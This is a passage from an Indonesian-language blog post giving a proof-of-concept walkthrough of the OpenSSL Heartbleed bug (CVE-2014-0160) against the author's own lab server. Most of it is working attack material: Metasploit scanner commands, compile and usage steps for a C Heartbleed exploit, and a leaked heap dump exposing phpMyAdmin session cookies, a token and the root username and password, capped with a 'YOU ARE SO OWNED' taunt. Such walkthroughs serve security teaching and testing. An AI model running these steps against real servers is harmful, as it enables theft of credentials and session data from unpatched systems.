Heartbleed All Mighty: Prove of Concept

Ini mungkin menjadi post yang paling ditunggu-tunggu oleh pembaca setia double-dragon. Ya, PoC aka Prove of Concept. Berikut link-link yang mungkin berguna bagi kamu dalam memahami Heartbleed Bug

• Heartbleed All Mighty: Easy Explanation How Does It Works
• Heartbleed All Mighty: How Can This Be?!
• Heartbleed All Mighty: Massive Security Bug In OpenSSL

Dalam status saya tempo lalu, saya sebenarnya hendak meluncurkan PoC dari Heartbleed Bug pada tanggal 11 April. Namun kakak saya Krisan Alfa menyarankan agar saya meluncurkan serangan ke local server agar tidak timbul kerugian bagi pihak lain. Make sense! Dan salah satu partner saya Alfath juga menyarankan hal yang sama. Jadi saya mengambil keputusan untuk meracik sebuah vulnerable server untuk mewujudkan PoC ini. Thanks both of you, guys! You rocks!

PoC sendiri memiliki struktur yang idelnya (menurut saya) digambarkan dengan susunan seperti ini

1. Introduction of Bug
2. Explanation how Bug works
3. Po(Bug)C [Prove of Bug Concept]
4. Prevent Bug

Kita telah melewati pengenalan bug, dan penjelasan bug. Saat ini, saya akan menjelaskan PoC dari bug Heartbleed. 

Berikut spesifikasi vulnerable server yang berhasil saya buat

• Debian 7.4.0 Wheezy amd64 (available here)
• Kernel 3.2.0-4 (included in Debian 7.4.0)
• Apache 2.4.9 (available here)
• PHP 5.4.27 (available here)
• OpenSSL 1.0.1e (available here)
• PHPMyAdmin 4.1.13 (available here)
• Server installed on vmplayer 6.0.1
• Server IP Address 192.168.145.128
• HTTP web service 192.168.145.128:80
• HTTPS web service 192.168.145.128:443 (port ini yang akan kita uji)

Berikut tools yang saya gunakan dalam melakukan penetration test

• Metasploit Bleeding Edge Version 4.9.2-dev (how to install this tool is available here)
• Heartbleed Exploit OpenSSL Coded in C (exploit code is available here)

Dan tahukah kamu, berapa waktu yang saya butuhkan untuk membuat vulnerable server ini? 10 jam! Anyway, back to PoC. And here we go!

Metasploit in Action

Dalam tutorial ini saya menggunakan auxiliary heartbleed untuk melakukan pemindaian target, untuk mencari tau apakah mesin dapat diretas

msf > use auxiliary/scanner/ssl/openssl_heartbleed

Kemudian saya mengatur RHOST dengan IP target yaitu 192.168.145.128

msf auxiliary(openssl_heartbleed) > set RHOSTS 192.168.145.128

Dan

msf auxiliary(openssl_heartbleed) > exploit 

[+] 192.168.145.128:443 - Heartbeat response with leak
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

BOOM! Hasil pemindaian menyatakan bahwa server ini vulnerable terhadap Heartbleed Bug CVE-2014-0160.

Let's Load The Gun!

Copy C code di bawah ini atau download, kemudian rename dengan nama heartbleed.c

Compile source dengan gcc

NOTE: Versi GCC yang saya gunakan adalah GCC version: Debian 4.6.3-14 4.6.3

HOW TO COMPILE WITH DEBIAN

$ gcc heartbleed.c -o heartbleed -Wl,-Bstatic -lssl -Wl,-Bdynamic -lssl3 -lcrypto

HOW TO COMPILE WITH ARCH

$ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed

Jika kamu menggunakan DEBIAN based dan GAGAL, coba dengan versi ARCH LINUX!

Thanks for Damar Bungispo Girhan for pointing me to that problem! :D

Setelah itu akan muncul file binary heartbleed pada working directory kamu. Check file binary tersebut dengan perintah:

$ file heartbleed
heartbleed: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=0x475e2360fbc2037f413f14856a779342dbe6e8d8, not stripped

Lakukan stripping binary file dengan perintah

$ strip heartbleed

Kemudian check kembali file binary dengan perintah

$ file heartbleed 
heartbleed: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=0x475e2360fbc2037f413f14856a779342dbe6e8d8, stripped

Lock and loaded!

How to Use Heartbleed Exploit?

$ ./heartbleed 
[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit
[ =============================================================
[ try --help

$ ./heartbleed --help
[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit
[ =============================================================
[
[ --server|-s <ip/dns>    - the server to target
[ --port|-p   <port>      - the port to target
[ --file|-f   <filename>  - file to write data to
[ --bind|-b   <ip>        - bind to ip for exploiting clients
[ --precmd|-c <n>         - send precmd buffer (STARTTLS)
[               0 = SMTP
[               1 = POP3
[               2 = IMAP
[ --loop|-l       - loop the exploit attempts
[ --type|-t   <n>         - select exploit to try
[                           0 = null length
[               1 = max leak
[               n = heartbeat payload_length
[
[ --verbose|-v            - output leak to screen
[ --help|-h               - this output
[

Shoot the heart!

$ ./heartbleed -s 192.168.145.128 -p 443 -t 1 -f dumpfile
[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit
[ =============================================================
[ connecting to 192.168.145.128 443/tcp
[ connected to 192.168.145.128 443/tcp
[ <3 <3 <3 heart bleed <3 <3 <3
[ heartbeat returned type=24 length=16408
[ decrypting SSL packet
[ heartbleed leaked length=65535
[ final record type=24, length=16384
[ wrote 16381 bytes of heap to file 'dumpfile'
[ heartbeat returned type=24 length=16408
[ decrypting SSL packet
[ final record type=24, length=16384
[ wrote 16384 bytes of heap to file 'dumpfile'
[ heartbeat returned type=24 length=16408
[ decrypting SSL packet
[ final record type=24, length=16384
[ wrote 16384 bytes of heap to file 'dumpfile'
[ heartbeat returned type=24 length=16408
[ decrypting SSL packet
[ final record type=24, length=16384
[ wrote 16384 bytes of heap to file 'dumpfile'
[ heartbeat returned type=24 length=42
[ decrypting SSL packet
[ final record type=24, length=18
[ wrote 18 bytes of heap to file 'dumpfile'
[ done.

He's bleeding like a woman had menstruation! LOL! Sekarang kita lihat hasil dump kita

$ 00000000  76 73 ca 02 b4 c4 7f 18  d7 5b cb 07 16 98 b4 b9  |vs.......[......|
00000010  ba dc db dd dc 3e 84 ef  cd 92 0a 4e 5e dc b1 91  |.....>.....N^...|

[SNIP]

00000120  02 03 03 02 01 02 02 02  03 01 01 00 0f 00 01 01  |................|
00000130  4d 4c 2c 20 6c 69 6b 65  20 47 65 63 6b 6f 29 20  |ML, like Gecko) |
00000140  43 68 72 6f 6d 65 2f 33  33 2e 30 2e 31 37 35 30  |Chrome/33.0.1750|
00000150  2e 31 35 32 20 53 61 66  61 72 69 2f 35 33 37 2e  |.152 Safari/537.|
00000160  33 36 0d 0a 52 65 66 65  72 65 72 3a 20 68 74 74  |36..Referer: htt|
00000170  70 73 3a 2f 2f 31 39 32  2e 31 36 38 2e 31 34 35  |ps://192.168.145|
00000180  2e 31 32 38 2f 70 68 70  6d 79 61 64 6d 69 6e 2f  |.128/phpmyadmin/|
00000190  69 6e 64 65 78 2e 70 68  70 3f 64 62 3d 26 74 61  |index.php?db=&ta|
000001a0  62 6c 65 3d 26 73 65 72  76 65 72 3d 31 26 74 61  |ble=&server=1&ta|
000001b0  72 67 65 74 3d 26 74 6f  6b 65 6e 3d 32 39 63 66  |rget=&token=29cf|
000001c0  33 30 39 61 64 66 61 62  37 37 31 62 61 64 35 63  |309adfab771bad5c|
000001d0  61 64 35 66 34 33 63 62  32 32 31 63 0d 0a 41 63  |ad5f43cb221c..Ac|
000001e0  63 65 70 74 2d 45 6e 63  6f 64 69 6e 67 3a 20 67  |cept-Encoding: g|
000001f0  7a 69 70 2c 64 65 66 6c  61 74 65 2c 73 64 63 68  |zip,deflate,sdch|
00000200  0d 0a 41 63 63 65 70 74  2d 4c 61 6e 67 75 61 67  |..Accept-Languag|
00000210  65 3a 20 65 6e 2d 55 53  2c 65 6e 3b 71 3d 30 2e  |e: en-US,en;q=0.|
00000220  38 2c 69 64 3b 71 3d 30  2e 36 2c 6d 73 3b 71 3d  |8,id;q=0.6,ms;q=|
00000230  30 2e 34 0d 0a 43 6f 6f  6b 69 65 3a 20 70 6d 61  |0.4..Cookie: pma|
00000240  5f 6c 61 6e 67 3d 65 6e  3b 20 70 6d 61 5f 63 6f  |_lang=en; pma_co|
00000250  6c 6c 61 74 69 6f 6e 5f  63 6f 6e 6e 65 63 74 69  |llation_connecti|
00000260  6f 6e 3d 75 74 66 38 5f  67 65 6e 65 72 61 6c 5f  |on=utf8_general_|
00000270  63 69 3b 20 70 6d 61 5f  6d 63 72 79 70 74 5f 69  |ci; pma_mcrypt_i|
00000280  76 3d 79 33 63 6b 30 63  25 32 46 42 66 64 4d 25  |v=y3ck0c%2FBfdM%|
00000290  33 44 3b 20 70 68 70 4d  79 41 64 6d 69 6e 3d 70  |3D; phpMyAdmin=p|
000002a0  6e 35 63 37 31 70 33 61  74 35 68 37 6a 6e 6f 37  |n5c71p3at5h7jno7|
000002b0  63 36 34 36 30 64 69 33  6f 35 37 6a 65 65 34 3b  |c6460di3o57jee4;|
000002c0  20 70 6d 61 55 73 65 72  2d 31 3d 71 30 46 48 74  | pmaUser-1=q0FHt|
000002d0  7a 4d 62 61 56 67 25 33  44 3b 20 70 6d 61 50 61  |zMbaVg%3D; pmaPa|
000002e0  73 73 2d 31 3d 77 41 63  33 48 45 75 42 55 6e 63  |ss-1=wAc3HEuBUnc|
000002f0  25 33 44 3b 20 70 6d 61  5f 6e 61 76 69 5f 77 69  |%3D; pma_navi_wi|
00000300  64 74 68 3d 32 30 30 0d  0a 0d 0a be 3c 63 c4 9e  |dth=200.....<c..|
00000310  27 05 54 11 e9 50 f7 b7  c6 e2 a5 60 b9 b6 66 05  |'.T..P.....`..f.|
00000320  05 05 05 05 05 77 69 64  74 68 3d 32 30 30 0d 0a  |.....width=200..|
00000330  0d 0a 70 6d 61 5f 75 73  65 72 6e 61 6d 65 3d 72  |..pma_username=r|
00000340  6f 6f 74 26 70 6d 61 5f  70 61 73 73 77 6f 72 64  |oot&pma_password|
00000350  3d 70 61 73 73 77 6f 72  64 26 73 65 72 76 65 72  |=password&server|
00000360  3d 31 26 74 61 72 67 65  74 3d 69 6e 64 65 78 2e  |=1&target=index.|
00000370  70 68 70 26 74 6f 6b 65  6e 3d 32 39 63 66 33 30  |php&token=29cf30|
00000380  39 61 64 66 61 62 37 37  31 62 61 64 35 63 61 64  |9adfab771bad5cad|
00000390  35 66 34 33 63 62 32 32  31 63 50 0e d3 2f e3 8b  |5f43cb221cP../..|
000003a0  9a 0e 71 b6 57 c9 2f e1  ae ac 5f e6 8f 5b 06 06  |..q.W./..._..[..|
000007a0  00 00 00 00 00 f8 08 66  01 00 00 00 00 c0 31 66  |.......f......1f|
000007b0  01 00 00 00 00 21 00 00  00 00 00 00 00 60 01 00  |.....!.......`..|
000007c0  00 00 00 00 00 20 74 69  74 6c 65 3d 22 00 80 e9  |..... title="...|
000007d0  00 00 00 00 00 21 00 00  00 00 00 00 00 80 01 00  |.....!..........|
000007e0  00 00 00 00 00 22 00 00  00 00 00 00 00 74 00 e9  |.....".......t..|
000007f0  00 00 00 00 00 60 00 00  00 00 00 00 00 21 00 00  |.....`.......!..|
00000800  00 00 00 00 00 18 80 e9  00 00 00 00 00 70 46 02  |.............pF.|
00000810  01 00 00 00 00 40 00 00  00 00 00 00 00 21 00 00  |.....@.......!..|
00000820  00 00 00 00 00 d8 7f e9  00 00 00 00 00 98 08 66  |...............f|
00000830  01 00 00 00 00 21 00 00  00 00 00 00 00 20 00 00  |.....!....... ..|
00000840  00 00 00 00 00 50 72 65  76 69 6f 75 73 00 7f e9  |.....Previous...|
00000850  00 00 00 00 00 31 00 00  00 00 00 00 00 f0 03 00  |.....1..........|
00000860  00 00 00 00 00 60 26 66  01 00 00 00 00 03 00 00  |.....`&f........|
00000870  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000880  00 00 01 00 00 f1 00 00  00 00 00 00 00 b8 e7 01  |................|
00000890  00 00 00 00 00 00 00 00  00 00 00 00 00 05 00 00  |................|
000008a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

[SNIP]

00000910  00 00 01 00 00 48 08 66  01 00 00 00 00 05 00 00  |.....H.f........|
00000920  00 06 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000930  00 00 01 00 00 88 08 66  01 00 00 00 00 09 00 00  |.......f........|
00000940  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000950  00 00 01 00 00 e8 08 66  01 00 00 00 00 04 00 00  |.......f........|
00000960  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000970  00 00 01 00 00 90 2f 01  00 00 00 00 00 f1 00 00  |....../.........|
00000980  00 00 00 00 00 48 b2 65  01 00 00 00 00 48 b2 65  |.....H.e.....H.e|
0000fdc0  01 00 00 00 00 74 65 64  22 00 00 00 00 39 00 00  |.....ted"....9..|
0000fdd0  00 00 00 00 00 68 00 00  00 00 00 00 00 70 6d 61  |.....h.......pma|
0000fde0  5f 67 65 74 72 65 6c 61  74 69 6f 6e 73 70 61 72  |_getrelationspar|
0000ffc0  65 73 00 00 00 40 00 00  00 00 00 00 00 21 00 00  |es...@.......!..|
0000ffd0  00 00 00 00 00 d0 1e c6  01 00 00 00 00 a0 2a 68  |..............*h|
0000ffe0  01 00 00 00 00 21 00 00  00 00 00 00 00 20 00 00  |.....!....... ..|
0000fff0  00 00 00 00 00 64 62 00  00 00 00 00 00 00 dc c8  |.....db.........|
00010000  4c 39 67 4b bc 9d ab 8f  47 8e 44 61 2b 0f 1d 78  |L9gK....G.Da+..x|
00010010  50 58                                             |PX|
00010012

pma_username=root
pma_password=password

YOU

ARE

SO

OWNED

BY

RED-DRAGON